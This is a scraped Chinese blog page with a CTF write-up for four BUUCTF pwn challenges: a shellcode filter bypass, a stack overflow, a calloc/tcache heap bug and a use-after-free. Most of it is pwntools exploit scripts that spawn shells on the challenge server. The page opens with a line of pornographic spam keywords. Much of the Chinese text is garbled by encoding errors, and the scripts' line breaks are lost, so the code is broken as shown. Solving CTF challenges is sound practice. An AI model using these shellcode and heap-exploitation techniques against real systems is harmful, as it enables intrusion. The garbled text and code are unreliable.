日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 >

PWN-PRACTICE-BUUCTF-27

發(fā)布時間:2023/12/10 43 豆豆
生活随笔 收集整理的這篇文章主要介紹了 PWN-PRACTICE-BUUCTF-27 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

PWN-PRACTICE-BUUCTF-27

    • starctf_2019_babyshell
    • picoctf_2018_buffer overflow 0
    • gyctf_2020_signin
    • bjdctf_2020_YDSneedGrirlfriend

starctf_2019_babyshell

用\x00繞過shellcode檢測,call rdx 跳轉(zhuǎn)過去執(zhí)行匯編代碼,一個\x00必執(zhí)行失敗
于是需要找一條機器碼以\x00開始的匯編指令,參考:x86匯編語言雜記

from pwn import * context.arch='amd64' #context.log_level='debug' #io=process('./starctf_2019_babyshell') io=remote('node4.buuoj.cn',29263) elf=ELF('./starctf_2019_babyshell') shellcode='\x00\x42\x00'+asm(shellcraft.sh()) io.recvuntil('plz:\n') io.sendline(shellcode) io.interactive()

picoctf_2018_buffer overflow 0

signal函數(shù)設(shè)置11為目標(biāo)信號,當(dāng)程序訪問無效地址時,便會觸發(fā)信號,執(zhí)行sigsegv_handler函數(shù)
vuln函數(shù)中存在棧溢出漏洞,覆蓋返回地址為無效地址即可

gyctf_2020_signin

calloc分配chunk時,不會從tcache bin中分配,參考:gyctf_2020_signin:ubuntu18.04配合calloc產(chǎn)生的漏洞

# -*- coding:utf-8 -*- from pwn import * #io=process("./gyctf_2020_signin") io=remote("node4.buuoj.cn",26888) elf=ELF("./gyctf_2020_signin") libc=ELF("./libc-2.27-18-x64.so")def add(index):io.sendlineafter("your choice?","1")io.sendlineafter("idx?\n",str(index)) def edit(index,content):io.sendlineafter("your choice?","2")io.sendlineafter("idx?\n",str(index))io.sendline(content) def free(index):io.sendlineafter("your choice?","3")io.sendlineafter("idx?\n",str(index)) def backdoor():io.sendlineafter("your choice?","6")ptr=0x4040C0for i in range(8):add(i) for i in range(8):free(i) add(8) edit(7,p64(ptr-0x10)) backdoor() io.interactive()

bjdctf_2020_YDSneedGrirlfriend

UAF,參考:bjdctf_2020_YDSneedGrirlfriend

# -*- coding:utf-8 -*- from pwn import * #io=process("./bjdctf_2020_YDSneedGrirlfriend") io=remote("node4.buuoj.cn",25051) elf=ELF("./bjdctf_2020_YDSneedGrirlfriend") libc=ELF("./libc-2.23.so")def add(name_size,name):io.sendlineafter("Your choice :","1")io.sendlineafter("Her name size is :",str(name_size))io.sendlineafter("Her name is :",name) def free(index):io.sendlineafter("Your choice :","2")io.sendlineafter("Index :",str(index)) def show(index):io.sendlineafter("Your choice :","3")io.sendlineafter("Index :",str(index)) def exit():io.sendlineafter("Your choice :","4")backdoor=0x400B9C#gdb.attach(io) #pause()add(0x10,"aaaa")#0 add(0x10,"bbbb")#1#pause()free(0)#pause()free(0)#pause()add(0x20,"cccc")#pause()add(0x10,p64(backdoor))#pause()show(0)io.interactive()

總結(jié)

以上是生活随笔為你收集整理的PWN-PRACTICE-BUUCTF-27的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。